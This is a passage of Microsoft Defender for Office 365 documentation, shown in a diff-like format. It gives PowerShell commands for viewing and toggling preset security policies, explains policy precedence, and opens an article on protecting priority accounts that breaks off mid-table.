--- **Built-in protection preset security policy**: The associated policies are named Built-In Protection Policy. The IsBuiltInProtection property value is True for these policies.-
- To view the individual security policies for the Built-in protection preset security policy, run the following command:
-
- ```powershell
- Write-Output -InputObject ("`r`n"*3),"Built-in protection Safe Attachments policy",("-"*79);Get-SafeAttachmentPolicy -Identity "Built-In Protection Policy" | Format-List; Write-Output -InputObject ("`r`n"*3),"Built-in protection Safe Links policy",("-"*79);Get-SafeLinksPolicy -Identity "Built-In Protection Policy" | Format-List
- ```
--- **Standard preset security policy**: The associated policies are named `Standard Preset Security Policy<13-digit number>`. For example, `Standard Preset Security Policy1622650008019`. The RecommendPolicyType property value for the policies is Standard.-
- - To view the individual security policies for the Standard preset security policy in organizations with **EOP only**, run the following command:
-
- ```powershell
- Write-Output -InputObject ("`r`n"*3),"Standard anti-malware policy",("-"*79);Get-MalwareFilterPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Standard"; Write-Output -InputObject ("`r`n"*3),"Standard anti-spam policy",("-"*79);Get-HostedContentFilterPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Standard"; Write-Output -InputObject ("`r`n"*3),"Standard anti-phishing policy",("-"*79);Get-AntiPhishPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Standard"
- ```
-
- - To view the individual security policies for the Standard preset security policy in organizations with **Defender for Office 365**, run the following command:
-
- ```powershell
- Write-Output -InputObject ("`r`n"*3),"Standard anti-malware policy",("-"*79);Get-MalwareFilterPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Standard"; Write-Output -InputObject ("`r`n"*3),"Standard anti-spam policy",("-"*79);Get-HostedContentFilterPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Standard"; Write-Output -InputObject ("`r`n"*3),"Standard anti-phishing policy",("-"*79);Get-AntiPhishPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Standard"; Write-Output -InputObject ("`r`n"*3),"Standard Safe Attachments policy",("-"*79);Get-SafeAttachmentPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Standard"; Write-Output -InputObject ("`r`n"*3),"Standard Safe Links policy",("-"*79);Get-SafeLinksPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Standard"
- ```
--- **Strict preset security policy**: The associated policies are named `Strict Preset Security Policy<13-digit number>`. For example, `Strict Preset Security Policy1642034872546`. The RecommendPolicyType property value for the policies is Strict.-
- - To view the individual security policies for the Strict preset security policy in organizations with **EOP only**, run the following command:
-
- ```powershell
- Write-Output -InputObject ("`r`n"*3),"Strict anti-malware policy",("-"*79);Get-MalwareFilterPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Strict"; Write-Output -InputObject ("`r`n"*3),"Strict anti-spam policy",("-"*79);Get-HostedContentFilterPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Strict"; Write-Output -InputObject ("`r`n"*3),"Strict anti-phishing policy",("-"*79);Get-AntiPhishPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Strict"
- ```
-
- - To view the individual security policies for the Strict preset security policy in organizations with **Defender for Office 365**, run the following command:
-
- ```powershell
- Write-Output -InputObject ("`r`n"*3),"Strict anti-malware policy",("-"*79);Get-MalwareFilterPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Strict"; Write-Output -InputObject ("`r`n"*3),"Strict anti-spam policy",("-"*79);Get-HostedContentFilterPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Strict"; Write-Output -InputObject ("`r`n"*3),"Strict anti-phishing policy",("-"*79);Get-AntiPhishPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Strict"; Write-Output -InputObject ("`r`n"*3),"Strict Safe Attachments policy",("-"*79);Get-SafeAttachmentPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Strict"; Write-Output -InputObject ("`r`n"*3),"Strict Safe Links policy",("-"*79);Get-SafeLinksPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Strict"
- ```
-### Use PowerShell to view rules for preset security policies
-
-Remember, if you never turned on the Standard preset security policy or the Strict preset security policy in the Microsoft Defender portal, the associated rules for those policies don't exist.
--- **Built-in protection preset security policy**: There's only one rule named ATP Built-In Protection Rule.-
- To view the rule that's associated with the Built-in protection preset security policy, run the following command:
-
- ```powershell
- Get-ATPBuiltInProtectionRule
- ```
--- **Standard preset security policy**: The associated rules are named Standard Preset Security Policy.-
- Use the following commands to view the rules that are associated with the Standard preset security policy:
-
- - To view the rule that's associated with **EOP protections** in the Standard preset security policy, run the following command:
-
- ```powershell
- Get-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy"
- ```
-
- - To view the rule that's associated with **Defender for Office 365 protections** in the Standard preset security policy, run the following command:
-
- ```powershell
- Get-ATPProtectionPolicyRule -Identity "Standard Preset Security Policy"
- ```
-
- - To view **both rules** at the same time, run the following command:
-
- ```powershell
- Write-Output -InputObject ("`r`n"*3),"EOP rule - Standard preset security policy",("-"*79);Get-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy"; Write-Output -InputObject ("`r`n"*3),"Defender for Office 365 rule - Standard preset security policy",("-"*79);Get-ATPProtectionPolicyRule -Identity "Standard Preset Security Policy"
- ```
--- **Strict preset security policy**: The associated rules are named Strict Preset Security Policy.-
- Use the following commands to view the rules that are associated with the Strict preset security policy:
-
- - To view the rule that's associated with **EOP protections** in the Strict preset security policy, run the following command:
-
- ```powershell
- Get-EOPProtectionPolicyRule -Identity "Strict Preset Security Policy"
- ```
-
- - To view the rule that's associated with **Defender for Office 365 protections** in the Strict preset security policy, run the following command:
-
- ```powershell
- Get-ATPProtectionPolicyRule -Identity "Strict Preset Security Policy"
- ```
-
- - To view **both rules** at the same time, run the following command:
-
- ```powershell
- Write-Output -InputObject ("`r`n"*3),"EOP rule - Strict preset security policy",("-"*79);Get-EOPProtectionPolicyRule -Identity "Strict Preset Security Policy"; Write-Output -InputObject ("`r`n"*3),"Defender for Office 365 rule - Strict preset security policy",("-"*79);Get-ATPProtectionPolicyRule -Identity "Strict Preset Security Policy"
- ```
-
-### Use PowerShell to turn on or turn off preset security policies
-
-To turn on or turn off the Standard or Strict preset security policies in PowerShell, enable or disable the rules that are associated with policy. The State property value of the rule shows whether the rule is Enabled or Disabled.
-
-If your organization has EOP only, you disable or enable the rule for EOP protections.
-
-If your organization has Defender for Office 365, you enable or disable the rule for EOP protections and the rule for Defender for Office 365 protections (enable or disable both rules).
--- **Organizations with EOP only**:-
- - Run the following command to determine whether the rules for the Standard and Strict preset security policies are currently enabled or disabled:
-
- ```powershell
- Write-Output -InputObject ("`r`n"*3),"EOP protection rule",("-"*50); Get-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy" | Format-Table Name,State; Write-Output -InputObject ("`r`n"*3),"EOP protection rule",("-"*50); Get-EOPProtectionPolicyRule -Identity "Strict Preset Security Policy" | Format-Table Name,State
- ```
-
- - Run the following command to turn off the Standard preset security policy if it's turned on:
-
- ```powershell
- Disable-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy"
- ```
-
- - Run the following command to turn off the Strict preset security policy if it's turned on:
-
- ```powershell
- Disable-EOPProtectionPolicyRule -Identity "Strict Preset Security Policy"
- ```
-
- - Run the following command to turn on the Standard preset security policy if it's turned off:
-
- ```powershell
- Enable-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy"
- ```
-
- - Run the following command to turn on the Strict preset security policy if it's turned off:
-
- ```powershell
- Enable-EOPProtectionPolicyRule -Identity "Strict Preset Security Policy"
- ```
--- **Organizations with Defender for Office 365**:-
- - Run the following command to determine whether the rules for the Standard and Strict preset security policies are currently enabled or disabled:
-
- ```powershell
- Write-Output -InputObject ("`r`n"*3),"EOP protection rule",("-"*50);Get-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy" | Format-Table Name,State; Write-Output -InputObject `r`n,"Defender for Office 365 protection rule",("-"*50);Get-ATPProtectionPolicyRule -Identity "Standard Preset Security Policy" | Format-Table Name,State; Write-Output -InputObject ("`r`n"*3),"EOP protection rule",("-"*50);Get-EOPProtectionPolicyRule -Identity "Strict Preset Security Policy" | Format-Table Name,State; Write-Output -InputObject `r`n,"Defender for Office 365 protection rule",("-"*50);Get-ATPProtectionPolicyRule -Identity "Strict Preset Security Policy" | Format-Table Name,State
- ```
-
- - Run the following command to turn off the Standard preset security policy if it's turned on:
-
- ```powershell
- Disable-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy"; Disable-ATPProtectionPolicyRule -Identity "Standard Preset Security Policy"
- ```
-
- - Run the following command to turn off the Strict preset security policy if it's turned on:
-
- ```powershell
- Disable-EOPProtectionPolicyRule -Identity "Strict Preset Security Policy"; Disable-ATPProtectionPolicyRule -Identity "Strict Preset Security Policy"
- ```
-
- - Run the following command to turn on the Standard preset security policy if it's turned off:
-
- ```powershell
- Enable-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy"; Enable-ATPProtectionPolicyRule -Identity "Standard Preset Security Policy"
- ```
-
- - Run the following command to turn on the Strict preset security policy if it's turned off:
-
- ```powershell
- Enable-EOPProtectionPolicyRule -Identity "Strict Preset Security Policy"; Enable-ATPProtectionPolicyRule -Identity "Strict Preset Security Policy"
- ```
-
-### Use PowerShell to specify recipient conditions and exceptions for preset security policies
-
-You can use a recipient condition or exception only once, but the condition or exception can contain multiple values:
--- Multiple **values** of the **same condition or exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_):
- - **Conditions**: If the recipient matches **any** of the specified values, the policy is applied to them.
- - **Exceptions**: If the recipient matches **any** of the specified values, the policy isn't applied to them.
--- Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.--- Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
-For the Built-in protection preset security policy, you can specify only recipient exceptions. If all exception parameter values are empty (`$null`), there are no exceptions to the policy.
-
-For the Standard and Strict preset security policies, you can specify recipient conditions and exceptions for EOP protections and Defender for Office 365 protections. If all of conditions and exception parameter values are empty (`$null`), there are no recipient conditions or exceptions to the Standard or Strict preset security policies.
--- **Built-in protection preset security policy**:-
- Use the following syntax:
-
- ```powershell
- Set-ATPBuiltInProtectionRule -Identity "ATP Built-In Protection Rule" -ExceptIfRecipientDomainIs <"domain1","domain2",... | $null> -ExceptIfSentTo <"user1","user2",... | $null> -ExceptIfSentToMemberOf <"group1","group2",... | $null>
- ```
-
- This example removes all recipient exceptions from the Built-in protection preset security policy.
-
- ```powershell
- Set-ATPBuiltInProtectionRule -Identity "ATP Built-In Protection Rule" -ExceptIfRecipientDomainIs $null -ExceptIfSentTo $null -ExceptIfSentToMemberOf $null
- ```
-
- For detailed syntax and parameter information, see [Set-ATPBuiltInProtectionRule](/powershell/module/exchange/set-atpbuiltinprotectionrule).
--- **Standard or Strict preset security policies**-
- Use the following syntax:
-
- ```powershell
- <Set-EOPProtectionPolicyRule | SetAtpProtectionPolicyRule> -Identity "<Standard Preset Security Policy | Strict Preset Security Policy>" -SentTo <"user1","user2",... | $null> -ExceptIfSentTo <"user1","user2",... | $null> -SentToMemberOf <"group1","group2",... | $null> -ExceptIfSentToMemberOf <"group1","group2",... | $null> -RecipientDomainIs <"domain1","domain2",... | $null> -ExceptIfRecipientDomainIs <"domain1","domain2",... | $null>
- ```
-
- This example configures exceptions from the EOP protections in the Standard preset security policy for members of the distribution group named Executives.
-
- ```powershell
- Set-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy" -ExceptIfSentToMemberOf Executives
- ```
-
- This example configures exceptions from the Defender for Office 365 protections in the Strict preset security policy for the specified security operations (SecOps) mailboxes.
-
- ```powershell
- Set-ATPProtectionPolicyRule -Identity "Strict Preset Security Policy" -ExceptIfSentTo "SecOps1","SecOps2"
- ```
-
- For detailed syntax and parameter information, see [Set-EOPProtectionPolicyRule](/powershell/module/exchange/set-eopprotectionpolicyrule) and [Set-ATPProtectionPolicyRule](/powershell/module/exchange/Set-atpprotectionpolicyrule).
-
-## Appendix
-
-Preset security policies consist of the following elements:
--- [Profiles](#profiles-in-preset-security-policies)-- [Policies](#policies-in-preset-security-policies)-- [Policy settings](#policy-settings-in-preset-security-policies)-
-These elements are described in the following sections.
-
-In addition, it's important to understand how preset security policies fit in the [order of precedence](#order-of-precedence-for-preset-security-policies-and-other-policies) with other policies.
-
-### Profiles in preset security policies
-
-A profile determines the level of protection. The following profiles are available for preset security policies:
--- **Standard protection**: A baseline profile that's suitable for most users.-- **Strict protection**: A more aggressive profile for selected users (high value targets or priority users).-- **Built-in protection** (Microsoft Defender for Office 365 only): Effectively provides default policies for Safe Links and Safe Attachments only.-
-In general, the **Strict protection** profile tends to quarantine less harmful email (for example, bulk and spam) than the **Standard protection** profile, but many of the settings in both profiles are the same (in particular, for unquestionably harmful email like malware or phishing). For a comparison of the setting differences, see the tables in the next section.
-
-Until you turn on the profiles and assign users to them, the Standard and Strict preset security policies are assigned to no one. In contrast, the Built-in protection preset security policy is assigned to all recipients by default, but you can configure exceptions.
-
-> [!IMPORTANT]
-> Unless you configure exceptions to the Built-in protection preset security policy, all recipients in the organization receive Safe Links and Safe Attachments protection.
-
-### Policies in preset security policies
-
-Preset security policies use special versions of the individual protection policies that are available in EOP and Microsoft Defender for Office 365. These policies are created _after_ you assign the **Standard protection** or **Strict protection** preset security policies to users.
--- **EOP policies**: These policies are in all Microsoft 365 organizations with Exchange Online mailboxes and standalone EOP organizations without Exchange Online mailboxes:-
- - [Anti-spam policies](anti-spam-policies-configure.md) named **Standard Preset Security Policy** and **Strict Preset Security Policy**.
- - [Anti-malware policies](anti-malware-policies-configure.md) named **Standard Preset Security Policy** and **Strict Preset Security Policy**.
- - [Anti-phishing policies (spoofing protection)](anti-phishing-policies-about.md#spoof-settings) named **Standard Preset Security Policy** and **Strict Preset Security Policy** (spoof settings).
-
- > [!NOTE]
- > Outbound spam policies aren't part of preset security policies. The default outbound spam policy automatically protects members of preset security policies. Or, you can create custom outbound spam policies to customize the protection for members of preset security policies. For more information, see [Configure outbound spam filtering in EOP](outbound-spam-policies-configure.md).
--- **Microsoft Defender for Office 365 policies**: These policies are in organizations with Microsoft 365 E5 or Defender for Office 365 add-on subscriptions:
- - Anti-phishing policies in Defender for Office 365 named **Standard Preset Security Policy** and **Strict Preset Security Policy**, which include:
- - The same [spoof settings](anti-phishing-policies-about.md#spoof-settings) that are available in the EOP anti-phishing policies.
- - [Impersonation settings](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365)
- - [Advanced phishing thresholds](anti-phishing-policies-about.md#advanced-phishing-thresholds-in-anti-phishing-policies-in-microsoft-defender-for-office-365)
- - [Safe Links policies](safe-links-policies-configure.md) named **Standard Preset Security Policy**, **Strict Preset Security Policy**, and **Built-in Protection Policy**.
- - [Safe Attachments policies](safe-attachments-policies-configure.md) named **Standard Preset Security Policy**, **Strict Preset Security Policy**, and **Built-in Protection Policy**.
-
-As previously described, you can apply EOP protections to different users than Defender for Office 365 protections, or you can apply EOP and Defender for Office 365 protections to the same recipients.
-
-### Policy settings in preset security policies
-
-Fundamentally, you can't modify the individual policy settings in the protection profiles. Customizing the corresponding default policy or creating a new custom policy has no effect due to the [order of precedence](#order-of-precedence-for-preset-security-policies-and-other-policies) when the same user (recipient) is defined in multiple policies (the Standard and Strict preset security policies are _always_ applied first).
--- The Standard, Strict, and Built-in protection policy setting values, including the associated [quarantine policies](quarantine-policies.md#anatomy-of-a-quarantine-policy), are listed in the feature tables in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).-- You can also use Exchange Online PowerShell to quickly see all of the policy setting values as explained [earlier in this article](#use-powershell-to-view-individual-security-policies-for-preset-security-policies).-
-But, you need to configure the individual users (senders) and domains to receive [impersonation protection](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365) in Defender for Office 365. Otherwise, preset security policies automatically configure the following types of impersonation protection:
--- Domain impersonation protection for all domains that you own ([accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains)).-- [Mailbox intelligence protection (contact graph)](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).-
-The differences in meaningful policy settings in the Standard preset security policy and the Strict preset security policy are summarized in the following table:
-
-|&nbsp;|Standard|Strict|
-||::|::|
-|**Anti-malware policy**|No difference|No difference|
-|**Anti-spam policy**|||
-|&nbsp;&nbsp;**Bulk compliant level (BCL) met or exceeded** detection action (_BulkSpamAction_)|**Move message to Junk Email folder** (`MoveToJmf`)|**Quarantine message** (`Quarantine`)|
-|&nbsp;&nbsp;**Bulk email threshold** (_BulkThreshold_)|6|5|
-|&nbsp;&nbsp;**Spam** detection action (_SpamAction_)|**Move message to Junk Email folder** (`MoveToJmf`)|**Quarantine message** (`Quarantine`)|
-|**Anti-phishing policy**|||
-|&nbsp;&nbsp;**If the message is detected as spoof by spoof intelligence** (_AuthenticationFailAction_)|**Move message to Junk Email folder** (`MoveToJmf`)|**Quarantine message** (`Quarantine`)|
-|**Show first contact safety tip** (_EnableFirstContactSafetyTips_)|Selected (`$true`)|Selected (`$true`)|
-|&nbsp;&nbsp;**If mailbox intelligence detects an impersonated user** (_MailboxIntelligenceProtectionAction_)|**Move message to Junk Email folder** (`MoveToJmf`)|**Quarantine message** (`Quarantine`)|
-|&nbsp;&nbsp;**Phishing email threshold** (_PhishThresholdLevel_)|**3 - More aggressive** (`3`)|**4 - Most aggressive** (`4`)|
-|**Safe Attachments policy**|No difference|No difference|
-|**Safe Links policy**|No difference|No difference|
-
-The differences in Safe Attachments and Safe Links policy settings in the Built-in protection preset security policy and in the Standard and Strict preset security policies are summarized in the following table:
-
-|&nbsp;|Built-in protection|Standard and Strict|
-||::|::|
-|**Safe Attachments policy**|No difference|No difference|
-|**Safe Links policy**|||
-|&nbsp;&nbsp;**Let users click through to the original URL** (_AllowClickThrough_)|Selected (`$true`)|Not selected (`$false`)|
-|&nbsp;&nbsp;**Do not rewrite URLs, do checks via Safe Links API only** (_DisableURLRewrite_)|Selected (`$true`)|Not selected (`$false`)|
-|&nbsp;&nbsp;**Apply Safe Links to email messages sent within the organization** (_EnableForInternalSenders_)|Not selected (`$false`)|Selected (`$true`)|
-
-For details about these settings, see the feature tables in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).
-
-### Order of precedence for preset security policies and other policies
-
-When a recipient is defined in multiple policies, the policies are applied in the following order:
-
-1. The Strict preset security policy.
-2. The Standard preset security policy.
-3. [Defender for Office 365 evaluation policies](try-microsoft-defender-for-office-365.md#audit-mode-vs-blocking-mode-for-defender-for-office-365)
-4. Custom policies based on the priority of the policy (a lower number indicates a higher priority).
-5. The Built-in protection preset security policy for Safe Links and Safe Attachments; the default policies for anti-malware, anti-spam, and anti-phishing.
-
-In other words, the settings of the Strict preset security policy override the settings of the Standard preset security policy, which overrides the settings from any anti-phishing, Safe Links, or Safe Attachments evaluation policies, which override the settings from any custom policies, which override the settings of the Built-in protection preset security policy for Safe Links and Safe Attachments, and the default policies for anti-spam, anti-malware, and anti-phishing.
-
-This order is shown on the pages of the individual security policies in the Defender portal (the policies are applied in the order they're shown on the page).
-
-For example, an admin configures the Standard preset security policy and a custom anti-spam policy with the same recipient. The anti-spam policy settings from the Standard preset security policy are applied to the user instead of what's configured in the custom anti-spam policy or in the default anti-spam policy.
-
-Consider applying the Standard or Strict preset security policies to a subset of users, and apply custom policies to other users in your organization to meet specific needs. To meet this requirement, consider the following methods:
--- Use unambiguous groups or lists of recipients in the Standard preset security policy, the Strict preset security, and in custom policies so exceptions aren't required. Using this method, you don't need to account for multiple policies applying to the same users and the effects of the order of precedence.-- If you can't avoid multiple policies applying to the same users, use the following strategies:
- - Configure recipients who should get the settings of the **Standard** preset security policy and custom policies as exceptions in the **Strict** preset security policy.
- - Configure recipients who should get the settings of custom policies as exceptions in the **Standard** preset security policy.
- - Configure recipients who should get the settings of the Built-in protection preset security policy or default policies as exceptions to custom policies.
-
-The **Built-in protection** preset security policy doesn't affect recipients in existing Safe Links or Safe Attachments policies. If you already configured **Standard protection**, **Strict protection** or custom Safe Links or Safe Attachments policies, those policies are _always_ applied _before_ **Built-in protection**, so there's no effect on the recipients who are already defined in those existing preset or custom policies.
-
-For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
security Priority Accounts Security Recommendations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/priority-accounts-security-recommendations.md
- Title: Security recommendations for priority accounts in Microsoft 365, priority accounts, priority accounts in Office 365, priority accounts in Microsoft 365
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - m365solution-overview
- - m365solution-protecthve
- - highpri
- - tier1
-
-description: Admins can learn how to elevate the security settings and use reports, alerts, and investigations for priority accounts in their Microsoft 365 organizations.
- Previously updated : 7/31/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Security recommendations for priority accounts in Microsoft 365
--
-Not all user accounts have access to the same company information. Some accounts have access to sensitive information, such as financial data, product development information, partner access to critical build systems, and more. If compromised, accounts that have access to highly confidential information pose a serious threat. We call these types of accounts _priority accounts_. Priority accounts include (but aren't limited to) CEOs, CISOs, CFOs, infrastructure admin accounts, build system accounts, and more.
-
-Microsoft Defender for Office 365 supports priority accounts as tags that can be used in filters in alerts, reports, and investigations. For more information, see [User tags in Microsoft Defender for Office 365](user-tags-about.md).
-
-For attackers, ordinary phishing attacks that cast a random net for ordinary or unknown users are inefficient. On the other hand, _spear phishing_ or _whaling_ attacks that target priority accounts are very rewarding for attackers. So, priority accounts require stronger than ordinary protection to help prevent account compromise.
-
-Microsoft 365 and Microsoft Defender for Office 365 contain several key features that provide additional layers of security for your priority accounts. This article describes these capabilities and how to use them.
--
-|Task|All Office 365 Enterprise plans|Microsoft 365 E3|Microsoft 365 E5|
-||::|::|::|
-|[Increase sign-in security for priority accounts](#increase-sign-in-security-for-priority-accounts)|:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|
-|[Use Strict preset security policies for priority accounts](#use-strict-preset-security-policies-for-priority-accounts)|:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|
-|[Apply user tags to priority accounts](#apply-user-tags-to-priority-accounts)|||:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|
-|[Monitor priority accounts in alerts, reports, and detections](#monitor-priority-accounts-in-alerts-reports-and-detections)|||:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|
-|[Train users](#train-users)|:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|:::image type="icon" source="../../media/d238e041-6854-4a78-9141-049224df0795.png" border="false":::|
-
-> [!NOTE]
-> For information about securing _privileged accounts_ (admin accounts), see [this topic](/purview/privileged-access-management).
-
-## Increase sign-in security for priority accounts
-
-Priority accounts require increased sign-in security. You can increase their sign-in security by requiring multi-factor authentication (MFA) and disabling legacy authentication protocols.
-
-For instructions, see [Step 1. Increase sign-in security for remote workers with MFA](/microsoft-365/solutions/empower-people-to-work-remotely-secure-sign-in). Although this article is about remote workers, the same concepts apply to priority users.
-
-**Note**: We strongly recommend that you globally disable legacy authentication protocols for all priority users as described in the previous article. If your business requirements prevent you from doing so, Exchange Online offers the following controls to help limit the scope of legacy authentication protocols:
--- You can ([until October 2023](https://techcommunity.microsoft.com/t5/exchange-team-blog/deprecation-of-client-access-rules-in-exchange-online/ba-p/3638563)) use [Client Access Rules](/exchange/clients-and-mobile-in-exchange-online/client-access-rules/client-access-rules) in Exchange Online to block or allow Basic authentication and legacy authentication protocols like POP3, IMAP4, and authenticated SMTP for specific users.--- You can disable POP3 and IMAP4 access on individual mailboxes. You can disable authenticated SMTP at the organizational level and enable it on specific mailboxes that still require it. For instructions, see the following articles:
- - [Enable or Disable POP3 or IMAP4 access for a user](/exchange/clients-and-mobile-in-exchange-online/pop3-and-imap4/enable-or-disable-pop3-or-imap4-access)
- - [Enable or disable authenticated client SMTP submission (SMTP AUTH)](/exchange/clients-and-mobile-in-exchange-online/authenticated-client-smtp-submission)
-
-It's also worth noting that Basic authentication is in the process of being deprecated in Exchange Online for Exchange Web Services (EWS), Exchange ActiveSync, POP3, IMAP4, and remote PowerShell. For details, see this [blog post](https://developer.microsoft.com/office/blogs/deferred-end-of-support-date-for-basic-authentication-in-exchange-online/).
-
-## Use Strict preset security policies for priority accounts
-
-Priority users require more stringent actions for the various protections that are available in Exchange Online Protection (EOP) and Defender for Office 365.
-
-For example, instead of delivering messages that were classified as spam to the Junk Email folder, you should quarantine those same messages if they're intended for priority accounts.
-
-You can implement this stringent approach for priority accounts by using the Strict profile in preset security policies.
-
-Preset security policies are a convenient and central location to apply our recommended Strict policy settings for all of the protections in EOP and Defender for Office 365. For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).
-
-For details about how the Strict policy settings differ from the default and Standard policy settings, see [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).
-
-## Apply user tags to priority accounts
-
-User tags in Microsoft Defender for Office 365 Plan 2 (as part of Microsoft 365 E5 or an add-on subscription) are a way to quickly identify and classify specific users or groups of users in reports and incident investigations.
-
-**Priority accounts** is a type of built-in user tag (known as a _system tag_) that you can use to identify incidents and alerts that involve priority accounts. For more information about **priority accounts**, see [Manage and monitor priority accounts](/microsoft-365/admin/setup/priority-accounts).
-
-You can also create custom tags to further identify and classify your priority accounts. For more information, see [User tags](user-tags-about.md). You can manage **priority accounts** (system tags) in the same interface as custom user tags.
-
-## Monitor priority accounts in alerts, reports, and detections
-
-After you secure and tag your priority users, you can use the available reports, alerts, and investigations in EOP and Defender for Office 365 to quickly identify incidents or detections that involve priority accounts. The features that support user tags are described in the following table.
-
-|Feature|Description|
-|||
-|Alerts|The user tags of affected users are visible and available as filters on the **Alerts** page in the Microsoft Defender portal. For more information, see [Alert policies in the Microsoft Defender portal](alert-policies-defender-portal.md).|
-|Incidents|The user tags for all correlated alerts are visible on the **Incidents** page in the Microsoft Defender portal. For more information, see [Manage incidents and alerts](mdo-sec-ops-manage-incidents-and-alerts.md).|
-|Custom alert policies|You can create alert policies based on user tags in the Microsoft Defender portal. For more information, see [Alert policies in the Microsoft Defender portal](alert-policies-defender-portal.md).|
-|Explorer <p> Real-time detections|In **Explorer** (Defender for Office 365 Plan 2) or **Real-time detections** (Defender for Office 365 Plan 1), user tags are visible in the Email grid view and the Email details flyout. User tags are also available as a filterable property. For more information, see [Tags in Threat Explorer](threat-explorer-threat-hunting.md#tags-in-threat-explorer).|
-|Email entity page|You can filter email based on applied user tags in Microsoft 365 E5 and in Defender for Office 365 Plan 1 and Plan 2. For more information, see [Email entity page](mdo-email-entity-page.md).|
-|Campaign Views|User tags are one of many filterable properties in Campaign Views in Microsoft Defender for Office 365 Plan 2. For more information, see [Campaign Views](campaigns.md).|
-|Threat protection status report|In virtually all of the views and detail tables in the **Threat protection status report**, you can filter the results by **priority accounts**. For more information, see [Threat protection status report](reports-email-security.md#threat-protection-status-report).|
-|Top senders and recipients report|You can add this user tag to the top 20 message senders in your organization. For more information, see [Top senders and recipients report](reports-email-security.md#top-senders-and-recipients-report).|
-|Compromised user report|User accounts that are marked as **Suspicious** or **Restricted** in Microsoft 365 organizations with Exchange Online mailboxes shows up in this report. For more information, see [Compromised user report](reports-email-security.md#compromised-users-report).|
-|Admin submissions and user reported messages|Use the Submissions page in the Microsoft Defender portal to submit email messages, URLs, and attachments to Microsoft for analysis. For more information, see [Admin submissions and user reported messages](submissions-admin.md).|
-|Quarantine|Quarantine is available to hold potentially dangerous or unwanted messages in Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations for **Priority accounts**. For more information, see [Quarantine email messages](quarantine-about.md).|
-|Attack simulation|To test your security policies and practices, run a benign cyberattack simulation for your target users. For more information, see [Attack simulation](attack-simulation-training-simulations.md#target-users).|
-|Email issues for priority accounts report|The **Email issues for priority accounts** report in the Exchange admin center (EAC) contains information about undelivered and delayed messages for **priority accounts**. For more information, see [Email issues for priority accounts report](/exchange/monitoring/mail-flow-reports/mfr-email-issues-for-priority-accounts-report).|
-
-## Train users
-
-Training users with priority accounts can help save those users and your security operations team much time and frustration. Savvy users are less likely to open attachments or click links in questionable email messages, and they're more likely to avoid suspicious websites.
-
-The Harvard Kennedy School [Cybersecurity Campaign Handbook](https://www.belfercenter.org/CyberPlaybook) provides excellent guidance for establishing a strong culture of security awareness within your organization, including training users to identify phishing attacks.
-
-Microsoft 365 provides the following resources to help inform users in your organization:
-
-|Concept|Resources|Description|
-||||
